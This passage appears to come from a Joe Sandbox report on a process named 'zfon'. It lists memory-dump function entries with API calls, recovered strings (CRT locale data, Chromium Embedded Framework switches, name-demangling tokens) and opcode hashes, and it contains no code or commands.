                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$isspace$memcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4286874901-0
                                                                                                                                                                            • Opcode ID: a7cacee42fec9bc54e8c85013c6daead1b90f4f637215d6f750a428c02b29c8f
                                                                                                                                                                            • Instruction ID: 4ab4f62d60f20c254631467b70403a6de766a046abbab67fd3a010bdbf1fb399
                                                                                                                                                                            • Opcode Fuzzy Hash: a7cacee42fec9bc54e8c85013c6daead1b90f4f637215d6f750a428c02b29c8f
                                                                                                                                                                            • Instruction Fuzzy Hash: E1A1AF23B09A8381FF20AB71A4403BDA7B6AB45BD4F848135DE5E57B99DF3CE4458310
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$mallocmemcpymemmove$cef_string_map_alloc
                                                                                                                                                                            • String ID: URL
                                                                                                                                                                            • API String ID: 719352336-1657866020
                                                                                                                                                                            • Opcode ID: 168b038dedbd7a2adf5ab60fb53ede074d21d5be4126ca81a8b5d324e9c0f5d1
                                                                                                                                                                            • Instruction ID: 28b51a4b5e3cb106ba07af750057e9e499433249ace7e112f177969785e0d61f
                                                                                                                                                                            • Opcode Fuzzy Hash: 168b038dedbd7a2adf5ab60fb53ede074d21d5be4126ca81a8b5d324e9c0f5d1
                                                                                                                                                                            • Instruction Fuzzy Hash: D9E19123B09B8289EF10EBB5D4503AC77B2EB45B98F444935DE5D2BB99DE38D019C350
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                            • String ID: `anonymous namespace'
                                                                                                                                                                            • API String ID: 3863519203-3062148218
                                                                                                                                                                            • Opcode ID: 7b7e9226b92562ce1af46590ad6a9382ebbecfc6adce6f9c26686976aa1ce793
                                                                                                                                                                            • Instruction ID: d7e18f57aa0666bb39c561e950e6e6540e7c12abe743d131e4669cf5c34d7ef8
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b7e9226b92562ce1af46590ad6a9382ebbecfc6adce6f9c26686976aa1ce793
                                                                                                                                                                            • Instruction Fuzzy Hash: A5E1C2BAA08B8299EB10CF34D8842EE77A0FB44784F616135EB4D67B55DF38E525CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc$memset
                                                                                                                                                                            • String ID: ://
                                                                                                                                                                            • API String ID: 1954376288-1869659232
                                                                                                                                                                            • Opcode ID: 3c99838cff2f80900afbfc6a0716ade2ae5093bdf5dba71e4019bd00798dd8e4
                                                                                                                                                                            • Instruction ID: a8ec9f8aa2bf713933d0b48cdc6a1b39e83e5c4370fcc5da32a0bdd8818e713c
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c99838cff2f80900afbfc6a0716ade2ae5093bdf5dba71e4019bd00798dd8e4
                                                                                                                                                                            • Instruction Fuzzy Hash: 98C17132A08A8695EF34EB75E8443A9A372FB84754F804435DA8D07BA9DF3CE595C321
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$free$cef_string_map_allocmemcpy$mallocmemmove
                                                                                                                                                                            • String ID: clear$writeCertHolder$writeUrl
                                                                                                                                                                            • API String ID: 614388589-602964746
                                                                                                                                                                            • Opcode ID: 83fc9b4681ec39642372cc4b7684638f3dd717f5f945e170e6391de16c446b5e
                                                                                                                                                                            • Instruction ID: 90a3346c92dee146387a14bcbeac28c0a09c934f9097f0f4ce7978c5b2d3b258
                                                                                                                                                                            • Opcode Fuzzy Hash: 83fc9b4681ec39642372cc4b7684638f3dd717f5f945e170e6391de16c446b5e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5DC1C363B09A4685EF20EB79D4503ADA372EB84B94F848931DE4E177A6DF2CD445C320
                                                                                                                                                                            APIs
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FC2E
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FC82
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FCD2
                                                                                                                                                                            • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B5FD76
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FD93
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FDC9
                                                                                                                                                                            • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B5FDF4
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE11
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE3A
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B5FE72
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B5FD24
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B5FEAE
                                                                                                                                                                              • Part of subcall function 00007FFBC1B65920: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B6592F
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFBC1B5FD9E
                                                                                                                                                                            • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFBC1B5FE1C
                                                                                                                                                                            • :AM:am:PM:pm, xrefs: 00007FFBC1B5FE68
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: calloc$free$Concurrency::cancel_current_task$ExceptionGetdaysGetmonthsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_func_lock_localesmallocmemcpystd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                                                                                            • API String ID: 1555941588-35662545
                                                                                                                                                                            • Opcode ID: 4984866773faa2ba8b097bb784f106a27c12d0944b280fa2bc18804908d0bf42
                                                                                                                                                                            • Instruction ID: e9eae5d9078442affca81b04702a206c6afb2d4341a7f75340064d1fb986a92e
                                                                                                                                                                            • Opcode Fuzzy Hash: 4984866773faa2ba8b097bb784f106a27c12d0944b280fa2bc18804908d0bf42
                                                                                                                                                                            • Instruction Fuzzy Hash: FEB1E3AAA09B8186EB118F31E90427AA7A1FB19FD0F186274DF5D27795DF3CE441CB40
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: disable-extensions$disable-gpu$disable-gpu-compositing$disable-gpu-vsync$disable-pdf-extension$disable-surfaces$enable-smooth-scrolling$enable-system-flash
                                                                                                                                                                            • API String ID: 1576575606-2877818427
                                                                                                                                                                            • Opcode ID: 24952cdb2a72154fed4a212a990a3a1018c8566a43075a85daee53fbdbeba300
                                                                                                                                                                            • Instruction ID: 39987fc6b7961b4850b2eb658fb8164bd375eeb9d267892952a895c9a031bbc3
                                                                                                                                                                            • Opcode Fuzzy Hash: 24952cdb2a72154fed4a212a990a3a1018c8566a43075a85daee53fbdbeba300
                                                                                                                                                                            • Instruction Fuzzy Hash: A2914D22B09A1785FF20EBB8D8903BC6772AF85B58F944131DE4D676A9DF38D845C360
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1462992686-0
                                                                                                                                                                            • Opcode ID: da85e19d1928f2fc23d8437a8b2b23bbeb13877c9a32a0fb184de9c485545f0d
                                                                                                                                                                            • Instruction ID: 165aa4ca479abcc4fcdd02b4aa243331ec2cd91b33684debca2fd160a3f71bb8
                                                                                                                                                                            • Opcode Fuzzy Hash: da85e19d1928f2fc23d8437a8b2b23bbeb13877c9a32a0fb184de9c485545f0d
                                                                                                                                                                            • Instruction Fuzzy Hash: E5B18D2260DB8285EB75EB25A4443AAB7A2FB45BC4F999034DE8D07798EF3CE445C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameName::$Name::operator+atolswprintf_s
                                                                                                                                                                            • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                                            • API String ID: 2331677841-2441609178
                                                                                                                                                                            • Opcode ID: 67fbf97d81b02749f9509a8c4f2694abdb9786e9786639b69dd16a9e3b2c746f
                                                                                                                                                                            • Instruction ID: 56252bd724e82bd3a47633f93edd2c42d6857c951be448b3414f312c5d819e15
                                                                                                                                                                            • Opcode Fuzzy Hash: 67fbf97d81b02749f9509a8c4f2694abdb9786e9786639b69dd16a9e3b2c746f
                                                                                                                                                                            • Instruction Fuzzy Hash: 31F1A3EAE0861288FF259F74D9992FF27A1AF05784F622135D90D36A95DE3CA505CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$memcpy$mallocmemmove
                                                                                                                                                                            • String ID: eu-cookie-compliance-agreed
                                                                                                                                                                            • API String ID: 3488293272-1104903451
                                                                                                                                                                            • Opcode ID: bebb11dbb65a13a40cc3fc36cdb00a75aa414d922c668014217f24f1d0b0e14c
                                                                                                                                                                            • Instruction ID: 05a0bd657e94894ebc7028be06c9efe417ad67ae3758aff4afc80e69e6af4742
                                                                                                                                                                            • Opcode Fuzzy Hash: bebb11dbb65a13a40cc3fc36cdb00a75aa414d922c668014217f24f1d0b0e14c
                                                                                                                                                                            • Instruction Fuzzy Hash: 1B916C22A19B8285EB20DB75E8403AEA7B1FB85B94F540635EE8D47B99DF3CD040C760
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulxiswctype$DscaleStofltStoxfltXp_addhXp_mulh
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3318484812-0
                                                                                                                                                                            • Opcode ID: a768420c2b5fff2fb4244aeac776d75f58bcfee5bf1117b7cc1e02417c62bbbc
                                                                                                                                                                            • Instruction ID: bab995c2d7af78bbd921d679a9e2c46a1eb8ca129776164a09adb08417536eea
                                                                                                                                                                            • Opcode Fuzzy Hash: a768420c2b5fff2fb4244aeac776d75f58bcfee5bf1117b7cc1e02417c62bbbc
                                                                                                                                                                            • Instruction Fuzzy Hash: 4061C1AAF18A42D2E711DE75E4806BF6720FB84744F906132EE4E23A95DE3CE516CF00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xp_setw$Xp_setn$Xp_addhXp_addxXp_mulhXp_mulx$DscaleStofltStoxfltisspaceisxdigit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1532609390-0
                                                                                                                                                                            • Opcode ID: 04dc50dfbf98f029935054b8049ea78db01762cf3d60922a2d415e396d3f7e9b
                                                                                                                                                                            • Instruction ID: 038b57607b56e145a47dcc3be7fdaf2797922f3beacad3fed1bd4f7f5193971c
                                                                                                                                                                            • Opcode Fuzzy Hash: 04dc50dfbf98f029935054b8049ea78db01762cf3d60922a2d415e396d3f7e9b
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B61B3AAF085529AF710EEB2D4802FF3721AF54748F909135DE0D37A99DE3CE55A8B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
